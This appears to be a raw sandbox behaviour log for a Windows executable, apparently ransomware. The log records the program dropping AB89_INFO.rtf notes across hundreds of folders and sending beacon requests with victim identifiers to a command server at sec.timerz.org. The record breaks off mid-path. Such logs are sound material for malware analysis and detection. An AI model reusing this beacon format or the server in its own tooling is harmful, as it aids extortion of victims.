095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\modules\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\MEIPreload\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\AJM03J3Y\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9tnk39ho.Admin\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\http\js\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe HTTP URL 6 http://sec.timerz.org/addrecord.php?apikey=ab89_api_key&compuser=AVGLFESB|Admin&sid=a1wzRrVf6WBPmIHw&phase=0D059428EA9CB263|3362|1GB Process not Found File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Public\Pictures\Sample Pictures\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\Favorites\Microsoft Websites\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\amd64\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\ProgramData\Microsoft Help\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\RBDIK06K\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\fonts\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\extensions\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\LocalLow\Sun\Java\jdk1.7.0_80_x64\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\Contacts\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\cmm\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\Downloads\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\playlist\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Mozilla Firefox\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\bin\server\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\Music\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Public\Music\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Mozilla Maintenance Service\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Public\Downloads\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\bin\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Google\Chrome\Application\Dictionaries\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Public\Recorded TV\Sample Media\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\zi\America\Argentina\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\d5vrebxd.default-release\storage\permanent\chrome\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\db\lib\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\zi\Atlantic\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Mozilla Firefox\browser\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Public\Documents\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\Favorites\Windows Live\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\zi\Europe\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\ProgramData\Package Cache\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\packages\Patch\x64\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe HTTP URL 5 http://sec.timerz.org/addrecord.php?apikey=ab89_api_key&compuser=AVGLFESB|Admin&sid=a1wzRrVf6WBPmIHw&phase=[ALL]0D059428EA9CB263 Process not Found File created C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\sd\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\d5vrebxd.default-release\cache2\entries\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\ZMLBLRQ7\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\GPUCache\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Roaming\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\skins\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Installer\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Public\Libraries\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\management\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\zi\SystemV\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\Pictures\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\ProgramData\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\modules\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\http\requests\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\zi\America\Indiana\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe HTTP URL 9 http://sec.timerz.org/addrecord.php?apikey=ab89_api_key&compuser=AVGLFESB|Admin&sid=a1wzRrVf6WBPmIHw&phase=[FIN]0D059428EA9CB263|3310|52|3362 Process not Found File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\Videos\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\zi\Asia\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\d5vrebxd.default-release\OfflineCache\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\deploy\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Google\Update\Install\{5DF2DCA9-BD54-4513-9B32-2C551D72B961}\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Microsoft Sync Framework\v1.0\Runtime\x64\resources\1033\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe HTTP URL 2 http://sec.timerz.org/addrecord.php?apikey=ab89_api_key&compuser=AVGLFESB|Admin&sid=a1wzRrVf6WBPmIHw&phase=START Process not Found File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Public\Recorded TV\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\zi\Africa\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\WidevineCdm\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\Saved Games\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\zi\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\Searches\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Google\Update\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Mozilla Firefox\defaults\pref\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Adobe\Color\Profiles\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\zi\Antarctica\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\d5vrebxd.default-release\datareporting\archived\2020-06\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\Favorites\Links\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\All Users\Microsoft\MF\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\d5vrebxd.default-release\storage\permanent\chrome\idb\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Backup\new\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program 